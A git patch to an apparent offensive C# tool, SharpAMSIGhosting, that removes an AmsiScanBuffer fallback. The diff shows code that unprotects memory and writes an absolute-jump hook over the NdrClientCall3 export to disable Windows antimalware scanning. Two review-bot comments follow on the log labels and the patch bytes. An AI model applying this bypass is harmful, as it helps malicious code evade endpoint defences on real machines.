From d4273e7230aad0b6ad3e86675513710b7e48b774 Mon Sep 17 00:00:00 2001
From: heqnx
Date: Fri, 2 May 2025 13:54:21 +0300
Subject: removed the amsiscanbuffer fallback
---
 SharpAMSIGhosting/Program.cs | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/SharpAMSIGhosting/Program.cs b/SharpAMSIGhosting/Program.cs
index 75fb518..c9405e6 100644
--- a/SharpAMSIGhosting/Program.cs
+++ b/SharpAMSIGhosting/Program.cs
@@ -84,10 +84,10 @@ namespace AmsiGhost
 bool protectResult = Mem.VirtualProtect(func, new UIntPtr(PATCH_SIZE), PAGE_EXECUTE_READWRITE, out oldProtect);
 if (!protectResult)
 {
- Console.WriteLine($"[-] Failed to unprotect {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory");
+ Console.WriteLine("[-] Failed to unprotect NdrClientCall3 memory");
 return;
 }
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory unprotected");
+ Console.WriteLine("[+] NdrClientCall3 memory unprotected");
 long trampAddr = trampoline.ToInt64();
 byte[] patch = new byte[] { 0x48, 0xB8 }
@@ -95,9 +95,8 @@ namespace AmsiGhost
 .Concat(new byte[] { 0xFF, 0xE0 })
 .ToArray();
 Marshal.Copy(patch, 0, func, patch.Length);
- Console.WriteLine($"[+] Patch written to {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")}");
-
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} patched - AMSI Ghosting");
+ Console.WriteLine("[+] Patch written to NdrClientCall3");
+ Console.WriteLine("[+] NdrClientCall3 patched - AMSI ghosting complete");
 }
 catch (Exception ex)
 {
--
cgit v1.2.3
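Review bot: The new messages in the first hunk hard-code `NdrClientCall3`, yet the diffstat (4 insertions, 5 deletions in one file) shows the commit changes nothing except these strings, so whatever assigns `func` is untouched by it and sits outside both hunks. If an AmsiScanBuffer branch still exists there, the output now names the wrong export, and anyone reading or matching on these strings should not take the label as proof of which function was modified. The same holds for the two messages in the second hunk. I would state the invariant where the label is first printed, `// func always refers to NdrClientCall3 here; the AmsiScanBuffer fallback no longer exists`, or compute the label once next to the lookup and reuse it.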
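Review bot: The bytes that `Marshal.Copy` writes over `func` in the second hunk have no comment saying what they are or what state they leave the process in. The visible pieces `0x48, 0xB8` and `0xFF, 0xE0` bracket a value appended on a line between the two hunks that is not shown (presumably `trampAddr`), which reads as an absolute jump placed over the start of the export. I would document that above the copy: `// Overwrites the start of the export in this process with an absolute jump to trampoline; the loaded code then differs from the module's on-disk image`. That difference is what in-memory integrity checks against the module file report, so the closing "complete" message only confirms the write succeeded.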